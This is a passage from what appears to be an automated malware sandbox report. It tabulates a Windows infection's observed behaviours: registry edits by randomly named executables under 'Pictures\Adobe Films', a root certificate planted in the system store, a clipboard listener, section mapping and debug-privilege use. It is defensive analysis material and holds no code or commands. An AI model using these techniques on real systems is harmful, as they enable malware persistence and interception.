| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" | C:\Users\Admin\Pictures\Adobe Films\H4qQ5eq5WgfPy9pgenBRiiaH.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{24ad3ad4-a569-4530-98e1-ab02f9417aa8}\Instance\ | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\NodeSlot = "6" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\MRUListEx = ffffffff | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 = 56003100000000008e543d9212004170704461746100400009000400efbe8e543d92e55473672e0000008ce10100000001000000000000000000000000000000c97e6b004100700070004400610074006100000016000000 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\MRUListEx = ffffffff | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 = 9200310000000000e554446810003732424637337e3100007a0009000400efbee5544468e55447682e0000009c310200000008000000000000000000000000000000f18b3d00370032006200660037003300300033002d0035006400630030002d0034003400650039002d0038003700640038002d00360039003800660038003600370037006100630061006200000018000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\MRUListEx = ffffffff | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 = 5000310000000000e554446810004c6f63616c003c0009000400efbe8e543d92e55444682e0000009fe10100000001000000000000000000000000000000f18b3d004c006f00630061006c00000014000000 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Generic" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\NodeSlot = "8" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\Pictures\Adobe Films\kdnmdIr2m3Z75rmoxMQY45zR.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Adobe Films\TUsKZ9i3PovwwAgsSaLpghkJ.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Itvrzxmax2.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6DF1.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8AF1.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\Adobe Films\wd1PHHYFXTO2GwSbYNeKiEhd.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\Adobe Films\4AqwIgOuAzGydA7_h8I9ZZtr.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\Adobe Films\uw5KPJ6a18gzLPne_F5e0c1_.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\Adobe Films\vl16pz8ikehSoCEiO6vpU86F.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\RunDll32.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif | N/A |
